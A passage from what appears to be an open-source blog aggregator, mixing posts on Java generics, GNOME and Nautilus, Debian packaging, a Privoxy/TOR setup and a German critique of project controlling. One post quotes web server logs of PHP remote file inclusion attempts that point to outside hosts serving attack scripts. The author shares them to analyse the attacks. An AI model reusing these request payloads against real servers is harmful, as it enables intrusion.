is not satisfiable when T is a generic class itself (since there is no ArraySet<Double>.class syntax, for example). The best work-around I know is to drop the T subclassing restriction for restrictionClass:

class BagOf<T> {
  BagOf(Class<?> restrictionClass);
}

The cost is low (obviously no difference at runtime) - you just don't assert that the developer using your class specifies a restriction class derived from the class T used in the generics. That won't prevent certain programming errors such as this anymore

BagOf<Integer> bar = BagOf<Integer>(Double.class)

but these shouldn't be too hard to find/fix anyway.

Before submitting too clever suggestions, please make sure you've tested them. For example "if (obj instanceof T)" is not valid java code: since generics are implemented by erasure, T cannot be referenced in runtime statements.

P.S. It would obviously be nice if the Java syntax would allow Foo<Bar>.class (which at runtime would be the same as Foo.class, and at complie time would have the result type Class<Foo<Bar>>), but currently it does not for all I know.

P.P.S. I'm not looking for "Class<? extends T>", that is a different situation. The difficult case is when T is a Generic itself, not a subclass.

Update: JM Ibanez pointed me to Neal Gafter's Super Type Tokens, which apparently are the same as TypeLiteral in Google Guice. Thanks!

... might be due to a bug in Sun Java 6. Try upgrading to Java 6 Update 10 release candidate (also known as 'beta') or using a different Java VM such as IBMs or GNU. Worked for me.

Bug reported in Feb 2008 and Bug reported in Oct 2008 at Sun (note: they are marked as 'fix delivered' but that includes beta releases such as the 6u10RC linked above.

Seit Anfang dieses Jahrzehnts kombinieren sich zwei Arten des Projektcontrollings auf unheimliche Weise.

Zunächst einmal wird aus dem innerbetrieblichen Controlling, das aufgrund bewährter Strukturen bereits per se in der Lage ist, effizient und effektiv zu arbeiten, immer öfter das externe Controlling. Denn nur externe sind tatsächlich objektiv.

Des Weiteren wird aus dem normalen Controlling, das den Auftraggeber und die Lenkungsrunde bei der Steuerung unterstützt, das proaktive Controlling. Dieses greift bereits während der Entstehung von Ergebnissen ein und steuert hilft bereits der Projektleitung beim Steuern.

In Kombination natürlich richtig effizient. Proaktives externes Projektcontrolling, der Traum aller Verantwortlichen Auftraggeber. Bei Projekten die damit gesteuert werden, kann eigentlich nichts mehr schief gehen. Ein Werbespruch: “diese 2-5% des Projektbudgets sind ihre Lebensversicherung”.

Braucht man pEPC wirklich? Meiner Meinung nach nein, dahinter versteckt sich lediglich die von Beratungsunternehmen (neudeutsch: Consulting) geschickt verpackte Gelddruckmaschine.

Beispiel Ergebniscontrolling: Während früher z.B. Ergebniscontrolling darin bestand, die Erreichung von Meilensteinen (sowohl zeitlich als auch stichprobenweise inhaltlich) qualitätszusichern, wird im modernen pEPC bereits vorab der Prozess der Ergebnisfindung umfangreich begleitet. Klingt doch gut, oder?

Kann zu seltsamen Konstellationen führen, wenn für die Ergebniserstellung ein anderer Dienstleister verantwortlich ist. Man stelle sich vor: eine ressortübergreifend besetzte Arbeitsgruppe erarbeitet zu einem Thema ein Ergebnis, das danach zunächst durch die Projektleitung und dann die Lenkungsrunde abgenommen werden soll. Da es sich um ein komplexes Thema handelt hilft dabei ein Dienstleister mit. Nimmt man das proaktiv in pEPC ernst, dann wird der pEPC bereits während der Ergebnisfindung eingebunden, nicht erst wie früher üblich bei der Ergebnisabnahme. Hallo? Zwei Dienstleister für das gleiche Thema? Noch dazu muss der pEPC definitiv irgendetwas sagen, sonst würde auffallen, dass er überflüssig ist. “ihre Lebensversicherung”.

Beispiel Kostencontrolling: Große Projekte drohen oftmals bei den Kosten aus dem Ruder zu laufen. Deshalb leuchtet es ein, dass sich außerhalb des Projektes (muss es außerhalb des Konzerns sein?) noch jemand mit dem Mittelverbrauch des Projektes beschäftigt. Es sollte dabei die Planung und der jeweils aktuell tatsächliche Verbrauch im Auge behalten werden und gerade bei längeren Verträgen mit externen stichprobenweise geprüft werden, ob die Leistungen mit dem Auftrag vereinbar sind. Ist nur oftmals nicht zuviel zu tun und das fördert die Tendenz des externen pEPC, sich allumfassend um jede Ausgabe zu kümmern. Da wird dann schnell mal hinterfragt, warum 21,50 Euro hier und nicht dort verbucht wurden. Arghs.

Klar ist der Controller der natürlich Feind des Projektleiters. Der Versuch, diese Tatsache durch die Neudefinition von Tätigkeiten zu verschleiern und letztlich die Auftraggeber in trügerischer Sicherheit zu wiegen, gleichzeitig jedoch nur Mehrausgaben zu erzeugen, halte ich für den falschen Weg.

Liebe Consultants die pEPC anbieten: beweist mir bitte, dass mit eurem Ansatz Projekte tatsächlich besser gelaufen sind und Überschreitungen (Zeit, Budget) vermieden wurden.

There will be a smallish beer-crate and pizza party at the Openismus Berlin office on the Saturday night (20th September) after the Maemo summit. That will be an opportunity to introduce our new location to our employees, customers, and other Maemo/GNOME people. I think we can get Nokia to pay for the beer and pizza.

Lots of Maemo summit people will have left Berlin already by Saturday, so hopefully it won’t be the full 200 people. We can probably handle around 80. How about you add your name in the comments if you’ll be there. That will help us to plan, and will tell us whether we need to limit the numbers.

It’s Kastanienallee 88 (Google maps). The name’s on the doorbell outside, and we are in the building at the back.

I will be in Berlin from Tuesday, taking delivery of some furniture and other stuff, including a Wii plus projector, which should be nice for one of our extra rooms, and a fancy coffee machine. But in general the space will still be quite empty, with no secret stuff, so it seems like the right time to have a party there. It looks like we’ll have Internet and some Wi-Fi.

My baby son and girlfriend will be there, so we will probably dedicate one quiet room as the baby room. Finally Liam will get to meet Mathias’ Marc Andre.

As some might know, I've been working at the university for a few weeks now. I'm very happy how it all worked out, because of the people there and the subjects to work on. It's just great to think through some mind-bending index structure to improve reverse-k-nearest-neighbor queries. And the professor (who is very well known for his work on R*-Trees, the X-Tree, and the DBSCAN and OPTICS algorithms) really manages to aggregate excellent people.

(rkNN is the problem of finding those points for which a Nearest Neighbor Search [Wikipedia] would return the given point. There are many use cases for example in location based services.)

A lot of my work involves a framework which has been published recently on the SSDBM 2008 conference: ELKI - Environment for DeveLoping KDD-Applications Supported by Index-Structures

The goal of ELKI is to become what WEKA is for machine learning. And it's well on it's way for that.

ELKI aims at the data mining researcher, it's not designed to squeeze out the last bit of performance. Instead it allows you to compare different algorithms, try different index structures (including various spatial and metrical trees) and offers all kinds of functionality you can reuse. If you are planning to do some real world applications, it likely is still useful for prototyping.

In the last weeks I've already put quite some effort in ELKI, so expect the next version to be released with significant changes and new functionality. In fact some working functionality was just left out of the release because we hadn't cleaned up the code yet.

Currently, getting started with ELKI can be a bit tricky. It's not hard to use, but you just need to find out where to start. The next release will therefore include a "dummy algorithm" that mostly serves as being a template for implementing custom algorithms (it can also be used for benchmarking an index structure, though).

Many people are already aware of the amount of data Google can (and does) collect on them. Some people therefore refuse to use certain google applications altogether. Others just like them too much.

There are some services that won't work with heavy ad blocking and anonymizing services - others will work just fine. A prime example everybody uses is Google search.

Google search will work just fine if you use anonymizers. Google Mail won't.

Privoxy and TOR is a great combination for anonymizing, however you won't want to use them for bandwidth-heavy web surfing, and there is little benefit of using them for web sites where you authenticate anyway.

Here's a way to do a compromise:

Install and configure Privoxy and TOR. Make sure they work.

Setup a proxy.pac file (proxy autoconfiguration) for your browser like this:

function FindProxyForURL(url, host) {
    var google = /https?:\/\/([^/]*\.)?google\.[a-z]*($|\/)/;
    var tor = /https?:\/\/([^/]*)\.(exit|onion)($|\/)/;
    if (google.test(url)) {
        if (shExpMatch(url, "*.google.com/mail*")) {
            return "DIRECT";
        }
        return "PROXY 127.0.0.1:8118";
    }
    if (tor.test(url)) {
        return "PROXY 127.0.0.1:8118";
    }
    if (shExpMatch(host, "config.privoxy.org")) {
        return "PROXY 127.0.0.1:8118";
    }
    return "DIRECT";
}

and point your browser to it.

Add the following to your privoxy/user.action file:

{ +client-header-filter{hide-tor-exit-notation} }
.exit
{ +filter{js-events} +crunch-all-cookies }
.google./(search|blogsearch|scholar|images)

And don't forget to reload privoxy.

You should now be able to access Google search with enhanced privacy (I can't guarantee you they won't be able to track you though!) while at the same time you can access your Gmail account at full speed.

When using Google Search (including image, blog and scholar search, feel free to add additional services) you should be seeing a login button, while you could be accessing Google Mail at the same time in another tab.

This list is of course not exhaustive. You might want to actually use privoxy and TOR by default, and only disable it for certain sites (or configure privoxy accordingly). You get the idea: this is just a very minimal approach to disable tracking exactly by the Google search site. It all depends on how serious you are about privacy and how important data throughput is for you.

Also it will allow you to access certain TOR functionality (such as hidden services) without running TOR all the time (after all, it is and will always be slower than direct access).

[Update: apparently some TOR exit nodes trigger a spam protection on Google, and without cookies you can't solve the captcha. So the use of TOR doesn't work well with Google. All the privoxy cookie blocking however is still recommended.]

Last week I visited Berlin to look at offices and found one that’s perfect. I’m signing the contract now. It’s in Kastanienallee (recent Flickr photos), a lively main street in hip Prenzlauerberg. I’m excited. The location and office couldn’t be better.

There are 5 large offices, plus a beautiful large central area, with bare brick, stone tiles, and lots of light, and even a patio for summer meetings. It’s peaceful and secure in a building to the rear beyond the inner courtyard.

I’m now ordering lots of furniture and equipment. Hopefully we’ll have it mostly set up before the Maemo summit on the 19th/20th September so we can proudly show it to our friends. I’m even thinking of having a little GNOME/Maemo party there before we have moved in properly.

I hope that Berlin, and this amazing part of Berlin, and this wonderful office will help to attract new employees, maybe from outside of Germany.

From Roderich Schupp I received the following instructions:

cp /usr/share/doc/hal/examples/10-x11-input.fdi /etc/hal/fdi/policy/

And in order to set a default keymap:

<deviceinfo version="0.2">
  <device>
    <match key="input.xkb.rules" contains="base">
      <merge key="input.xkb.layout" type="string">de</merge>
      <merge key="input.xkb.variant" type="string">nodeadkeys</merge>
    </match>
  </device>
</deviceinfo>

Into yet another custom file in this directory.

Thank you, I'm going to try that on my next reboot (which may take a week).

Xorg 1.4 in experimental is supposed to have input device hotplugging.

Does anyone have a Howto for Debian? I tried it, but I couldn't get it to hot-plug my USB mouse, so I'm back to using the regular mouse driver for it again, using the /dev/input/mice in-kernel-hack for hotplugging.

P.S. on a recent kernel, you might want to add

blacklist snd_pcsp

to a custom file in /etc/modutils/, in order to avoid your PC speaker showing up as regular audio device. You don't want your regular apps to consider your legacy PC speaker as audio device usually.

P.S. No, my blog doesn't have comments. Just send me an email (you know, 'legacy' email) via erich AT debian org.

Before

Note how the regular grid layout is destroyed by the long file name, which can make its row very large.

After

Note how the grid layout is preserved, while the whole filename is still visible as the file is selected or hovered.

Take that five year old bug report! Thanks to the incredible Pango grand master Behdad. Many play the Banjo, but only few master the Pango.

Update

I received lots of feedback. Many appreciations were given, some usability concerns were raised and some people just didn’t like the change. Therefore, I added GConf keys that allow you to control in detail (i.e. for all zoom levels, and for the desktop) how many lines of text you want.

Another proposal was that file extensions should never be truncated. This will be implemented as Pango supports it. There is also an interesting recent user request to ellipsize file names depending on the other displayed file names (assuming you have “alongfilename-01-continuin-hereg.jpg”, “alongfilename-02-continuing-here.jpg” the result is supposed to be “along…e-01-…ere..jpg”, “along…e-02-…ere..jpg”.

YouTube video demoing a book with 3D pop-up letters. Very cool, even when the video requires Flash to watch.

From my security monitoring:

suhosin[25775]: ALERT - tried to register forbidden variable '_SERVER[DOCUMENT_ROOT]' through GET variables (attacker '67.19.104.82', file '[...]')

The web logs contained:

GET //?_SERVER[DOCUMENT_ROOT]=http://sekip.axspace.com/alat/r0x.txt?? HTTP/1.1

Is this some new PHP attack vector (that happens to be blocked by the suhosin security module)? I thought it was related to ConPresso, but I've also found similar accesses in my logs that were on sites that don't use PHP (and thus did not trigger a suhosin alert). Obviously these don't relate to ConPresso, so it seems more like a brute force / mass attack?

Another host involved:

80.93.54.47 ... GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt? HTTP/1.1

That referenced URL still works, so if you want you can retrieve the 'exploit' code. But all it apparently does is to try various methods to execute "id", probably to locate web servers that are vulnerable and maybe even running as "root" user.

Obviously this is a brute force; that site doesn't have an index.php.

Is that anything new? Or is it just some script kiddie trying to re-use an aged exploit? But on the other hand, I havn't seen such a suhosin alert in months. Anybody knows which PHP script might be vulnerable to this attack vector.

If you've got any details, contact me at erich@debian.org; my blog intentionally does not have comments or trackbacks.

[Update: I've received two mails pointing out that such vulnerablities are found in some PHP apps every now and then, so it might just be some script kiddie scanning brute force once more. Supposedly this cannot be exploited when register_globals is off and/or suhosin is used.]

OpenSync update

To give some update on the state of OpenSync in Debian, I have uploaded libsycml-0.4.7 to experimental a couple of days ago. This is significant in sofar as a lot of development and bug-fixing (mostly by Michael Bell) happened for this release, as well as some committment to maintaining an API and at least responsively versioning the library. In order to use libsyncml-0.4.7 with OpenSync, a newer libopensync than 0.36 is needed; however, current OpenSync trunk has seen a lot of changes in plugin handling and plugins need to get ported to the new API.

So I uploaded the last known-working revision of OpenSync along with corresponing revisions of the file-sync and syncml plugins, the vformat module and a rebuild of msynctool to experimental for now. I did not have the time or energy to migrate/upload the other plugins yet, and as it seems that OpenSync-0.37 will only ship with ported file-sync and syncml plugins, it might not make much sense. I also took over maintainership of the related wbxml2 package, and upload a patch by Michael Bell which seem to fix a lot issues people are having with SyncML.

The good news is that it seems all of the new features for a 0.40 stable OpenSync release have been finished according to the roadmap , most notably a common plugin configuration system and the machinery for a migration path from 0.22 to 0.40 configurations (plugins still need to support/implement that I believe), so no more big API changes are expected and the focus will be on bugfixing and plugin discovery from now on. This means developers will be able to start porting their plugins to the 0.40 API once 0.37 is out and front-end authors can start to take a look at the architectural changes which were made to facilitate their jobs.

My hope is that conduit will be able to leverage the OpenSync technology and introduce a solid GUI for this (as kitchensync does for KDE), making syncronization finally work on the desktops.

From the Debian packaging point of view, I have been mostly on my own now for the last couple of months. However, I recently registered an Alioth project in order to maintain the packages in a subversion repository (I have not yet decided whether it is worth importing the 0.22 packages targetted at lenny), and people who are interested in helping should contact me.

As mentioned earlier, I've uploaded a new Pyroman release to Debian. I've also updated the download at the download page on alioth for the non-Debian users.

There is just one single user-visible change (under the hood I switched some Python API so you need python 2.4+ now, which was available in sarge already):

This version has a new command line option, "--verification-cmd". This can be used to point to a script file to verify network connectivity. For example, you could try to send a ping to the next router, or you could ssh to another host, have it ssh back and touch a flag file in /tmp to signal success.

Similar to the --safe option, it is meant as a safety feature to avoid locking yourself out of your system. But while --safe needs to be used interactively, this new command could be used when automatically activating new firewall rules, e.g. triggered by cfengine or some other configuration management. If the verification command does not succeed, the firewall rules will automatically be rolled back to the previous state.

Note that I didn't get around to add IPv6 support yet. It would definitely be desirable to add ip6tables support, but I currently do not have any experience with IPv6, so I'm not sure I'd know how to do things right. Of course I'd welcome any patches.

(In case you havn't read about pyroman yet - it's yet another tool to configure iptables firewalls. It puts a thin abstraction layer on top of iptables, but the main benefit is that it uses "iptables-restore" to quickly mass-set all the firewall rules - other tools tend to invoke several hundred iptables processes to achieve the same - and if any error occurs it will both give you a clear indication of which rule caused the error and rolling back your firewall to the previous state.)

Today, I uploaded a new version of my firewall configuration tool, pyroman, to Debian unstable.

About 4 hours later I googled for "Pyroman Debian" and was surprised to find the upload notification in the top results. The first hour of this was probably spent with me doing some package function tests (I don't want to upload broken packages, after all), then the announcement was distributed to the -changes mailing list at Debian, which in turn was picked up by Google Groups.

However that might be due to groups.google.com getting special treatment, though. For this resource, Google can actually trigger an update instead of having to have a spider frequently re-crawl all the contents.

Still I find it pretty impressive to have such new data already in their main index. I was used to this e.g. for blog and news search, but not for regular web search.

My advisors just told me my grade for my final thesis I handed in two weeks ago: a 1.0 (which is the best possible grade here).

Well, they've been quite clear about this being the likely result before, since the thesis worked out very well, with a publication on a good conference and such. So right now I'm looking forward to continuing this research and doing a PhD degree. Right now, this would be my favorite option, if I manage to get a position at the university.

Nautilus 2.23.5(.1) [shipped with GNOME 2.23.5] has tab support, an eject button next to mounted volumes in the sidebar, and a “restore” feature for the trash that figures out the location where a file came from automatically before moving it out of the trash.

Unfortunately, moving files out of the trash in general takes a very long time with GVFS due to a bug. We would be very pleased if you volunteered to fix the bug:

http://bugzilla.gnome.org/show_bug.cgi?id=529971

Since everybody nowadays comments on the future of GNOME/GTK+, I’d also like to add my two cents - although more briefly than others.

In short, I think we’ve reached our objectives and should polish GNOME 2 ’til doomsday.

3.0? No!

As of writing, I see no reason for delivering a (long-term) API/ABI-incompatible GNOME 3.0 or GTK+ 3.0, and many have written the same before. I’m just repeating it here to make sure that everybody, including the kind-hearted individuals who try to force a GSEAL’ed GTK+ to make it more clean, are aware of the massive opposition against this plan.

C is ugly as hell and does not support public/procted/private classes. Therefore, no C programmer can really mind ugly exposed internals. Adding setters and getters is a in principle a good idea, but there is no reason to break working applications that access data exposed in GTK+ structs. Maybe a GSEAL() fan could tell me how third-party subclasses that are derived from GTK+ stock widgets can access protected member variables? If you just expose getter/setter functions, everybody can access the internals, and you could have put it into the object’s struct anyway.

Status Quo: Conservative + Boring

The current GNOME and GTK+ development clearly “stalls” or “stagnates”. From the point of a developer this sounds horrible. However, you could also formulate that positively and call it “solid”. We’ve come a long way. Since GNOME 2.0, our target was to deliver a non-obtrusive, simple and useful desktop environment. We’ve done our best, and people love it. I know many people who use GNOME because it’s simple and clean.

Radical Concepts => New Project

We created a successful brand by radically sticking to one strategy: Simplicity. The current traditional desktop approach without any fancy database concepts is very successful and is used by many people.

The brand will be damaged if we throw in half-baked complex interaction concepts. Like many of you my dear readers, I love the idea to use the computer as a personal assistant or secretary, and I’ve also thought how it could work in such a scenario. However, at least radical concepts (“GNOME Online Desktop”, “everything is organized as database”, etc.) should clearly be put forward outside the GNOME project, at least until they are mature and proven in a testing environment with average people instead of “innovation” fanboys. “Innovation”, after all, is just a buzzword, and in science they often just re-invent old concepts. I’m sure that the scientists among you will agree with this.

It may sound a bit disappointing that we’ve become conservative, but that’s the typical life cycle of people in western civilization, why shouldn’t it also apply to software projects with well-defined objectives?

I’d walk around and tell people to find more useful projects than wasting their time with adding tabs to each single GNOME application. Maybe the semmingly true rumors that one or another GNOME fellow might be somewhat lunatic (panties, anybody?) inspired theprogrammers who are implementing this.

One initial aspect: Calumn is totally right that tab implementations at application level are an effect of the lack of platform MDI support. We implement it at application level where we need solutions today and tomorrow, rather than the day after tomorrow. However, it is not yet clear whether tabs are useful at all for 90% of the applications.

Why tabs for Nautilus (and web browsers, spreadsheet, …) are a good idea

Let me briefly explain why I added tab support to Nautilus: It helps people with their workflow. Today, I used it to tidy up my document folders. I could use it to navigate between file operation source and destination folders extremely quickly, using the keyboard and ctrl-x, ctrl-v, and ctrl-page-up/down. I was two times as fast as with a console (where you need auto-completion), and five times as fast as with a mouse

Tab support for browser-like file managers is a good idea, because people know how to use the tab concept properly since it has been invented for web browser. It is also useful for spreadsheets, where you often compare multiple documents and calculations. It is also useful for having multiple conversations at once, because each of them is linear, and you can use the tabs to switch between losely-associated linear tasks or documents.

Why tabs for media players are a bad idea

On the other hand, tab support in Totem is ridiculous. Somebody must have put LSD into the GUADEC social event food, and everybody now feels like Syd Barrett and his Lucifer Cat!

Regarding Totem: It is already perfectly doing what it should do: Play a song or video, and let me queue more of them. One song or video at once. How can I watch two videos at once?

Why you should think first, and implement features afterwards (i.e. gcalctool tabs)!

Let me exemplify this regarding gcalctool:

Even my non-programmable pocket calculator (Casio FX-991ES) has more features than this non-noticeable desktop calculator. Amongst others, it can not deal with symbolic calculations, complex numbers, nature constants, variables. It does not even have a calculation history as I mentioned in a comment in Scott James’ blog. This is a shame! Before you implement such a craptastic feature, think about how it will be used! Again: gcalctool does not have any calculation history. This is as if I implemented tabs in Nautilus without implementing the back/forward button before, so you had to switch to a new tab each time you want to display a new folder.

Now I’ll do something useful and learn for my function theory exam.

You talented developers at GUADEC should also do something useful and fix the GTK+ tree view mouse interaction.

All-Clear :o)

It turns out that the tab implementations were just mockups. Have fun at GUADEC!

Munich Blogs - Open Source

Network sharing

Import

Drag and drop layout

Print Layout

Windows Installer

What’s next

Installer, documented

Multiple compilers

Why tabs for Nautilus (and web browsers, spreadsheet, …) are a good idea

Why tabs for media players are a bad idea

Why you should think first, and implement features afterwards (i.e. gcalctool tabs)!

All-Clear :o)

Munich Subcultures

Abonnements

Links

Technisches

Advertising